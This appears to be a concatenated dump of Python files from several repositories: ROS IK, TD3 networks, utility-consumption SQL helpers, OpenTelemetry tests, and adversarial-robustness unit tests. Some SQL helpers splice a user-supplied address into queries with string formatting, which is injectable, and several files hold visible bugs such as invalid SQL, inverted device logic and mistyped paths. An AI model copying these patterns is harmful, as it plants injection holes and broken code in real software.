%tarPose ## IK for target position jointTarg = arm.get_IK(tarPose) print 'IK calculation step:DONE' ## planning with joint target from IK planTraj = arm.plan_jointTargetInput(jointTarg) print 'Planning step with target joint angles:DONE' ## planning with pose target #print 'Planning step with target pose' #planTraj = arm.plan_poseTargetInput(tarPose) ## execution of the movement #print 'Execution of the plan' # arm.group[0].execute(planTraj) if __name__ == '__main__': ## First initialize moveit_commander and rospy. moveit_commander.roscpp_initialize(sys.argv) rospy.init_node('vector_basic_IK', anonymous=True) main() ```
{ "source": "AABL-Lab/Standard_ML_Library", "score": 3 }
#### File: Standard_ML_Library/td3/td3_networks.py ```python import numpy as np import os import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F class CriticNetwork(nn.Module): def __init__(self, beta, input_dims, fc1_dims, fc2_dims, n_actions, name, chkpt_dir="tmp/td3", device=None): super(CriticNetwork, self).__init__() self.input_dims = input_dims self.fc1_dims = fc1_dims self.fc2_dims = fc2_dims self.n_actions = n_actions self.name = name self.checkpoint_dir = chkpt_dir self.checkpoint_file = os.path.join(self.checkpoint_dir, name+"_td3") self.fc1 = nn.Linear(self.input_dims[0] + n_actions, self.fc1_dims) self.fc2 = nn.Linear(self.fc1_dims, self.fc2_dims) self.q1 = nn.Linear(self.fc2_dims, 1) self.optimizer = optim.Adam(self.parameters(), lr=beta) if not device is None: self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") else: self.device = device self.to(self.device) def forward(self, state, action): q1_action_value = self.fc1(torch.cat([state, action], dim=1)) q1_action_value = F.relu(q1_action_value) q1_action_value = self.fc2(q1_action_value) q1_action_value = F.relu(q1_action_value) q1 = self.q1(q1_action_value) return q1 def save_checkpoint(self): print("saving checkpoint") torch.save(self.state_dict(), self.checkpoint_file) def load_checkpoint(self): print("loading checkpoint") class ActorNetwork(nn.Module): def __init__(self, alpha, input_dims, fc1_dims, fc2_dims, n_actions, name, chkpt_dir="t,p/td3", device=None): super(ActorNetwork, self).__init__() self.input_dims = input_dims self.fc1_dims = fc1_dims self.fc2_dims = fc2_dims self.n_actions = n_actions self.name = name self.checkpoint_dir = chkpt_dir self.checkpoint_file = os.path.join(self.checkpoint_dir, name+"td3") # the * is for tuple unpacking self.fc1 = nn.Linear(*self.input_dims, self.fc1_dims) self.fc2 = nn.Linear(self.fc1_dims, self.fc2_dims) self.mu = nn.Linear(self.fc2_dims, self.n_actions) self.optimizer = optim.Adam(self.parameters(), lr=alpha) if not device is None: self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") else: self.device = device self.to(self.device) def forward(self, state): prob = self.fc1(state) prob = F.relu(prob) prob = self.fc2(prob) prob = F.relu(prob) mu = torch.tanh(self.mu(prob)) return mu def save_checkpoint(self): print("saving checkpoint") torch.save(self.state_dict(), self.checkpoint_file) def load_checkpoint(self): print("loading checkpoint") ```
{ "source": "aabmass/CIS4301-Project-GUL", "score": 3 }
#### File: backend/app/funFacts.py ```python import sys sys.path.append("../") from loaddb import dbutil def maxCityElect(): return dbutil.runSQLAsDict("""SELECT streetaddress, consumption from address, electricityreport where ( select Max(Consumption) from electricityreport) = electricityreport.consumption AND address.id = electricityreport.address_id""") def maxCityWater(): return dbutil.runSQLAsDict("""SELECT streetaddress, consumption from address, waterreport where ( select Max(Consumption) from waterreport) = waterreport.consumption AND address.id = waterreport.address_id""") def maxCityNatGas(): return dbutil.runSQLAsDict("""SELECT streetaddress, consumption from address, naturalgasreport where ( select Max(Consumption) from naturalgasreport) = naturalgasreport.consumption AND address.id = naturalgasreport.address_id""") def potentialLandscapingCustomers(): return dbutil.runSQLAsDict("""SELECT Count(violation) as LawnsInNeed from codeviolationsreport where violation = 'Overgrown Yard / Weeds'""") def fowlPlay(): return dbutil.runSQLAsDict("""SELECT count(id) as from CODEVIOLATIONSREPORT where VIOLATION = 'Fowl or Livestock Prohibited'""") def treeSqueezers(): return dbutil.runSQLAsDict("""SELECT count(id) as from CODEVIOLATIONSREPORT where VIOLATION = 'Dead or Hazardous Trees'""") def avgNumOne(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '1 %'""") def avgNumThree(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '3 %'""") def avgNumFour(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '4 %'""") def avgNumFive(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '5 %'""") def avgNumSix(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '6 %'""") def avgNumSeven(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '7 %'""") def avgNumEight(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '8 %'""") def avgNumNine(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '9 %'""") ``` #### File: backend/app/naturalgas.py ```python import sys sys.path.append("../") from loaddb import dbutil def cityTotalNatGas(): x = dbutil.runSQLAsDict("""SELECT SUM(Consumption) as tot from NaturalGasReport""") if x: return x else: return "N/A" def cityAvgNatGas(): x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avg from NaturalGasReport""") if x: return x else: return "N/A" def findNatGas(addrs): x = dbutil.runSQLAsDict("""SELECT Consumption from NaturalGasReport, Address Where Address.ID = NaturalGasReport.ADDRESS_ID AND Address.StreetAddress = {}""".format( '\'' + addrs + '\'')) if x: return x else: return "N/A" def streetNatGas(addrs): newAddrs = addrs.split(' ', 1) x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avgSt from NaturalGasReport, Address Where Address.ID = NaturalGasReport.ADDRESS_ID and Address.StreetAddress LIKE {}""".format('\'' + '% ' + newAddrs[1] + '\'')) return x if x: return x else: return "N/A" #class NaturalGasReport(object): # def __init__(self, id, address_Id, month,year, consumption): # self.id = id # self.address_Id=address_Id # self.month = month # self.year = year # self.consumption = consumption ``` #### File: backend/app/water.py ```python import sys sys.path.append("../") from loaddb import dbutil def cityTotalWater(): x = dbutil.runSQLAsDict("""SELECT SUM(Consumption) as tot from WaterReport""") if x: return x else: return "N/A" def cityAvgWater(): x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avg from WaterReport""") if x: return x else: return "N/A" def findWater(addrs): x = dbutil.runSQLAsDict("""SELECT Consumption from WaterReport, Address Where Address.ID = WaterReport.ADDRESS_ID AND Address.StreetAddress = {}""".format( '\'' + addrs + '\'')) if x: return x else: return "N/A" def streetWater(addrs): newAddrs = addrs.split(' ', 1) x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avgSt from WaterReport, Address Where Address.ID = WaterReport.ADDRESS_ID and Address.StreetAddress LIKE {}""".format('\'' + '% ' + newAddrs[1] + '\'')) if x: return x else: return "N/A" ``` #### File: backend/loaddb/createtables.py ```python from dbutil import * def createTables(): """ Populate the array with names of sql DDL files """ for sqlFileName in ["Address.sql", "Electricity.sql", "CodeViolationsReport.sql", "FireRescueEMSResponse.sql", "NaturalGasReport.sql", "WaterReport.sql"]: try: runSqlFile("create/" + sqlFileName) print "Created table '{}'".format(sqlFileName.split(".sql")[0]) except Exception as e: pass createTables() ```
{ "source": "aabmass/opentelemetry-operations-python", "score": 2 }
#### File: e2e-test-server/e2e_test_server/scenarios.py ```python import contextlib import os from dataclasses import dataclass from typing import Callable, Iterator, Mapping import pydantic from google.rpc import code_pb2 from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter from opentelemetry.sdk.trace import TracerProvider from opentelemetry.sdk.trace.export import BatchSpanProcessor from opentelemetry.sdk.trace.sampling import ALWAYS_ON from opentelemetry.trace import SpanKind, Tracer from .constants import INSTRUMENTING_MODULE_NAME, TEST_ID class Request(pydantic.BaseModel): test_id: str headers: Mapping[str, str] data: bytes @dataclass class Response: status_code: code_pb2.Code data: bytes = bytes() @contextlib.contextmanager def _tracer_setup() -> Iterator[Tracer]: """\ Context manager with common setup for tracing endpoints Yields a tracer (from a fresh SDK with new exporter) then finally flushes spans created during the test after. """ tracer_provider = TracerProvider( sampler=ALWAYS_ON, active_span_processor=BatchSpanProcessor( CloudTraceSpanExporter(project_id=os.environ.get("PROJECT_ID")) ), ) tracer = tracer_provider.get_tracer(INSTRUMENTING_MODULE_NAME) try: yield tracer finally: tracer_provider.shutdown() def health(request: Request) -> Response: return Response(status_code=code_pb2.OK) def basic_trace(request: Request) -> Response: """Create a basic trace""" with _tracer_setup() as tracer: with tracer.start_span( "basicTrace", attributes={TEST_ID: request.test_id} ): pass return Response(status_code=code_pb2.OK) def complex_trace(request: Request) -> Response: """Create a complex trace""" with _tracer_setup() as tracer: with tracer.start_as_current_span( "complexTrace/root", attributes={TEST_ID: request.test_id} ): with tracer.start_as_current_span( "complexTrace/child1", attributes={TEST_ID: request.test_id}, kind=SpanKind.SERVER, ): with tracer.start_as_current_span( "complexTrace/child2", attributes={TEST_ID: request.test_id}, kind=SpanKind.CLIENT, ): pass with tracer.start_as_current_span( "complexTrace/child3", attributes={TEST_ID: request.test_id}, ): pass return Response(status_code=code_pb2.OK) def not_implemented_handler(_: Request) -> Response: return Response(status_code=str(code_pb2.UNIMPLEMENTED)) SCENARIO_TO_HANDLER: dict[str, Callable[[Request], Response]] = { "/health": health, "/basicTrace": basic_trace, "/complexTrace": complex_trace, } ```
{ "source": "aabmass/opentelemetry-python", "score": 2 }
#### File: jaeger/translate/__init__.py ```python import abc from opentelemetry.trace import SpanKind OTLP_JAEGER_SPAN_KIND = { SpanKind.CLIENT: "client", SpanKind.SERVER: "server", SpanKind.CONSUMER: "consumer", SpanKind.PRODUCER: "producer", SpanKind.INTERNAL: "internal", } NAME_KEY = "otel.instrumentation_library.name" VERSION_KEY = "otel.instrumentation_library.version" def _nsec_to_usec_round(nsec: int) -> int: """Round nanoseconds to microseconds""" return (nsec + 500) // 10 ** 3 def _convert_int_to_i64(val): """Convert integer to signed int64 (i64)""" if val > 0x7FFFFFFFFFFFFFFF: val -= 0x10000000000000000 return val class Translator(abc.ABC): @abc.abstractmethod def _translate_span(self, span): """Translates span to jaeger format. Args: span: span to translate """ @abc.abstractmethod def _extract_tags(self, span): """Extracts tags from span and returns list of jaeger Tags. Args: span: span to extract tags """ @abc.abstractmethod def _extract_refs(self, span): """Extracts references from span and returns list of jaeger SpanRefs. Args: span: span to extract references """ @abc.abstractmethod def _extract_logs(self, span): """Extracts logs from span and returns list of jaeger Logs. Args: span: span to extract logs """ class Translate: def __init__(self, spans): self.spans = spans def _translate(self, translator: Translator): translated_spans = [] for span in self.spans: # pylint: disable=protected-access translated_span = translator._translate_span(span) translated_spans.append(translated_span) return translated_spans ```
{ "source": "aabobakr/adversarial-robustness-toolbox", "score": 2 }
#### File: tests/attacks/test_universal_perturbation.py ```python from __future__ import absolute_import, division, print_function, unicode_literals import logging import unittest import numpy as np from art.attacks.universal_perturbation import UniversalPerturbation from art.classifiers import KerasClassifier from art.utils import load_dataset, master_seed, get_classifier_tf, get_classifier_kr, get_classifier_pt from art.utils import get_iris_classifier_tf, get_iris_classifier_kr, get_iris_classifier_pt logger = logging.getLogger('testLogger') BATCH_SIZE = 100 NB_TRAIN = 500 NB_TEST = 10 class TestUniversalPerturbation(unittest.TestCase): """ A unittest class for testing the UniversalPerturbation attack. """ @classmethod def setUpClass(cls): # Get MNIST (x_train, y_train), (x_test, y_test), _, _ = load_dataset('mnist') x_train, y_train = x_train[:NB_TRAIN], y_train[:NB_TRAIN] x_test, y_test = x_test[:NB_TEST], y_test[:NB_TEST] cls.mnist = (x_train, y_train), (x_test, y_test) def setUp(self): # Set master seed master_seed(1234) def test_tfclassifier(self): """ First test with the TFClassifier. :return: """ # Build TFClassifier tfc, sess = get_classifier_tf() # Get MNIST (x_train, y_train), (x_test, y_test) = self.mnist # Attack up = UniversalPerturbation(tfc, max_iter=1, attacker="newtonfool", attacker_params={"max_iter": 5}) x_train_adv = up.generate(x_train) self.assertTrue((up.fooling_rate >= 0.2) or not up.converged) x_test_adv = x_test + up.noise self.assertFalse((x_test == x_test_adv).all()) train_y_pred = np.argmax(tfc.predict(x_train_adv), axis=1) test_y_pred = np.argmax(tfc.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == test_y_pred).all()) self.assertFalse((np.argmax(y_train, axis=1) == train_y_pred).all()) def test_krclassifier(self): """ Second test with the KerasClassifier. :return: """ # Build KerasClassifier krc, sess = get_classifier_kr() # Get MNIST (x_train, y_train), (x_test, y_test) = self.mnist # Attack up = UniversalPerturbation(krc, max_iter=1, attacker="ead", attacker_params={"max_iter": 5, "targeted": False}) x_train_adv = up.generate(x_train) self.assertTrue((up.fooling_rate >= 0.2) or not up.converged) x_test_adv = x_test + up.noise self.assertFalse((x_test == x_test_adv).all()) train_y_pred = np.argmax(krc.predict(x_train_adv), axis=1) test_y_pred = np.argmax(krc.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == test_y_pred).all()) self.assertFalse((np.argmax(y_train, axis=1) == train_y_pred).all()) def test_ptclassifier(self): """ Third test with the PyTorchClassifier. :return: """ # Build PyTorchClassifier ptc = get_classifier_pt() # Get MNIST (x_train, y_train), (x_test, y_test) = self.mnist x_train = np.swapaxes(x_train, 1, 3) x_test = np.swapaxes(x_test, 1, 3) # Attack up = UniversalPerturbation(ptc, max_iter=1, attacker="newtonfool", attacker_params={"max_iter": 5}) x_train_adv = up.generate(x_train) self.assertTrue((up.fooling_rate >= 0.2) or not up.converged) x_test_adv = x_test + up.noise self.assertFalse((x_test == x_test_adv).all()) train_y_pred = np.argmax(ptc.predict(x_train_adv), axis=1) test_y_pred = np.argmax(ptc.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == test_y_pred).all()) self.assertFalse((np.argmax(y_train, axis=1) == train_y_pred).all()) class TestUniversalPerturbationVectors(unittest.TestCase): @classmethod def setUpClass(cls): # Get Iris (x_train, y_train), (x_test, y_test), _, _ = load_dataset('iris') cls.iris = (x_train, y_train), (x_test, y_test) def setUp(self): master_seed(1234) def test_iris_k_clipped(self): (_, _), (x_test, y_test) = self.iris classifier, _ = get_iris_classifier_kr() # Test untargeted attack attack_params = {"max_iter": 1, "attacker": "newtonfool", "attacker_params": {"max_iter": 5}} attack = UniversalPerturbation(classifier) attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) self.assertTrue((x_test_adv <= 1).all()) self.assertTrue((x_test_adv >= 0).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) def test_iris_k_unbounded(self): (_, _), (x_test, y_test) = self.iris classifier, _ = get_iris_classifier_kr() # Recreate a classifier without clip values classifier = KerasClassifier(model=classifier._model, use_logits=False, channel_index=1) attack_params = {"max_iter": 1, "attacker": "newtonfool", "attacker_params": {"max_iter": 5}} attack = UniversalPerturbation(classifier) attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) def test_iris_tf(self): (_, _), (x_test, y_test) = self.iris classifier, _ = get_iris_classifier_tf() # Test untargeted attack attack_params = {"max_iter": 1, "attacker": "ead", "attacker_params": {"max_iter": 5, "targeted": False}} attack = UniversalPerturbation(classifier) attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) self.assertTrue((x_test_adv <= 1).all()) self.assertTrue((x_test_adv >= 0).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) def test_iris_pt(self): (_, _), (x_test, y_test) = self.iris classifier = get_iris_classifier_pt() attack_params = {"max_iter": 1, "attacker": "ead", "attacker_params": {"max_iter": 5, "targeted": False}} attack = UniversalPerturbation(classifier) attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) self.assertTrue((x_test_adv <= 1).all()) self.assertTrue((x_test_adv >= 0).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) if __name__ == '__main__': unittest.main() ``` #### File: tests/classifiers/test_detector_classifier.py ```python from __future__ import absolute_import, division, print_function, unicode_literals import logging import unittest import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from art.classifiers.pytorch import PyTorchClassifier from art.classifiers.detector_classifier import DetectorClassifier from art.utils import load_mnist, master_seed logger = logging.getLogger('testLogger') NB_TRAIN = 1000 NB_TEST = 2 class Model(nn.Module): def __init__(self): super(Model, self).__init__() self.conv = nn.Conv2d(1, 16, 5) self.pool = nn.MaxPool2d(2, 2) self.fc = nn.Linear(2304, 10) def forward(self, x): x = self.pool(F.relu(self.conv(x))) x = x.view(-1, 2304) logit_output = self.fc(x) return logit_output class Flatten(nn.Module): def forward(self, x): n, _, _, _ = x.size() result = x.view(n, -1) return result class TestDetectorClassifier(unittest.TestCase): """ This class tests the functionalities of the DetectorClassifier. """ @classmethod def setUpClass(cls): # Get MNIST (x_train, y_train), (x_test, y_test), _, _ = load_mnist() x_train, y_train = x_train[:NB_TRAIN], y_train[:NB_TRAIN] x_test, y_test = x_test[:NB_TEST], y_test[:NB_TEST] x_train = np.swapaxes(x_train, 1, 3) x_test = np.swapaxes(x_test, 1, 3) cls.mnist = (x_train, y_train), (x_test, y_test) # Define the internal classifier model = Model() loss_fn = nn.CrossEntropyLoss() optimizer = optim.Adam(model.parameters(), lr=0.01) classifier = PyTorchClassifier(model=model, loss=loss_fn, optimizer=optimizer, input_shape=(1, 28, 28), nb_classes=10, clip_values=(0, 1)) classifier.fit(x_train, y_train, batch_size=100, nb_epochs=2) # Define the internal detector conv = nn.Conv2d(1, 16, 5) linear = nn.Linear(2304, 1) torch.nn.init.xavier_uniform_(conv.weight) torch.nn.init.xavier_uniform_(linear.weight) model = nn.Sequential(conv, nn.ReLU(), nn.MaxPool2d(2, 2), Flatten(), linear) loss_fn = nn.CrossEntropyLoss() optimizer = optim.Adam(model.parameters(), lr=0.01) detector = PyTorchClassifier(model=model, loss=loss_fn, optimizer=optimizer, input_shape=(1, 28, 28), nb_classes=1, clip_values=(0, 1)) # Define the detector-classifier cls.detector_classifier = DetectorClassifier(classifier=classifier, detector=detector) def setUp(self): # Set master seed master_seed(1234) def test_predict(self): # Get MNIST (_, _), (x_test, y_test) = self.mnist # Test predict logits preds = self.detector_classifier.predict(x=x_test, logits=True) self.assertTrue(np.array(preds.shape == (NB_TEST, 11)).all()) # Test predict softmax preds = self.detector_classifier.predict(x=x_test, logits=False) self.assertAlmostEqual(np.sum(preds), NB_TEST, places=4) def test_nb_classes(self): dc = self.detector_classifier self.assertTrue(dc.nb_classes == 11) def test_input_shape(self): dc = self.detector_classifier self.assertTrue(np.array(dc.input_shape == (1, 28, 28)).all()) def _derivative(self, x, i1, i2, i3, i4, logits): delta = 1e-5 x_minus = x.copy() x_minus[:, i2, i3, i4] -= delta x_plus = x.copy() x_plus[:, i2, i3, i4] += delta result_plus = self.detector_classifier.predict(x_plus, logits=logits) result_minus = self.detector_classifier.predict(x_minus, logits=logits) result = (result_plus[:, i1] - result_minus[:, i1]) / (2 * delta) return result def test_class_gradient1(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = None grads = dc.class_gradient(x=x_test, logits=True, label=None) self.assertTrue(np.array(grads.shape == (NB_TEST, 11, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i1 in range(grads.shape[1]): for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, i1, i2, i3, i4, True) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.5: # print(result[i], grads[i, i1, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, i1, i2, i3, i4])) def test_class_gradient2(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = 5 grads = dc.class_gradient(x=x_test, logits=True, label=5) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 5, i2, i3, i4, True) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.5: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient3(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = 10 grads = dc.class_gradient(x=x_test, logits=True, label=10) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 10, i2, i3, i4, True) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.5: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient4(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = array # label = np.random.randint(11, size=NB_TEST) label = np.array([2, 10]) grads = dc.class_gradient(x=x_test, logits=True, label=label) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result1 = self._derivative(np.array([x_test[0]]), 2, i2, i3, i4, True) result2 = self._derivative(np.array([x_test[1]]), 10, i2, i3, i4, True) if np.abs(result1[0]) > 0.5: # print(result1[0], grads[0, 0, i2, i3, i4]) self.assertEqual(np.sign(result1[0]), np.sign(grads[0, 0, i2, i3, i4])) if np.abs(result2[0]) > 0.5: # print(result2[0], grads[1, 0, i2, i3, i4]) self.assertEqual(np.sign(result2[0]), np.sign(grads[1, 0, i2, i3, i4])) def test_class_gradient5(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = None grads = dc.class_gradient(x=x_test, logits=False, label=None) self.assertTrue(np.array(grads.shape == (NB_TEST, 11, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i1 in range(grads.shape[1]): for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, i1, i2, i3, i4, False) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.1: # print(result[i], grads[i, i1, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, i1, i2, i3, i4])) def test_class_gradient6(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = 2 grads = dc.class_gradient(x=x_test, logits=False, label=2) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 2, i2, i3, i4, False) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.1: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient7(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = 10 grads = dc.class_gradient(x=x_test, logits=False, label=10) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 10, i2, i3, i4, False) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.1: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient8(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = array # label = np.random.randint(11, size=NB_TEST) label = np.array([2, 10]) grads = dc.class_gradient(x=x_test, logits=False, label=label) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result1 = self._derivative(np.array([x_test[0]]), 2, i2, i3, i4, False) result2 = self._derivative(np.array([x_test[1]]), 10, i2, i3, i4, False) if np.abs(result1[0]) > 0.1: # print(result1[0], grads[0, 0, i2, i3, i4]) self.assertEqual(np.sign(result1[0]), np.sign(grads[0, 0, i2, i3, i4])) if np.abs(result2[0]) > 0.1: # print(result2[0], grads[1, 0, i2, i3, i4]) self.assertEqual(np.sign(result2[0]), np.sign(grads[1, 0, i2, i3, i4])) def test_set_learning(self): dc = self.detector_classifier self.assertTrue(dc.classifier._model.training) self.assertTrue(dc.detector._model.training) self.assertTrue(dc.learning_phase is None) dc.set_learning_phase(False) self.assertFalse(dc.classifier._model.training) self.assertFalse(dc.detector._model.training) self.assertFalse(dc.learning_phase) dc.set_learning_phase(True) self.assertTrue(dc.classifier._model.training) self.assertTrue(dc.detector._model.training) self.assertTrue(dc.learning_phase) def test_save(self): model = self.detector_classifier import tempfile import os t_file = tempfile.NamedTemporaryFile() full_path = t_file.name t_file.close() base_name = os.path.basename(full_path) dir_name = os.path.dirname(full_path) model.save(base_name, path=dir_name) self.assertTrue(os.path.exists(full_path + "_classifier.optimizer")) self.assertTrue(os.path.exists(full_path + "_classifier.model")) os.remove(full_path + '_classifier.optimizer') os.remove(full_path + '_classifier.model') self.assertTrue(os.path.exists(full_path + "_detector.optimizer")) self.assertTrue(os.path.exists(full_path + "_detector.model")) os.remove(full_path + '_detector.optimizer') os.remove(full_path + '_detector.model') def test_repr(self): repr_ = repr(self.detector_classifier) self.assertTrue('art.classifiers.detector_classifier.DetectorClassifier' in repr_) self.assertTrue('preprocessing=(0, 1)' in repr_) if __name__ == '__main__': unittest.main() ```
{ "source": "AAboElkhair/MyDoctor_Project", "score": 2 }
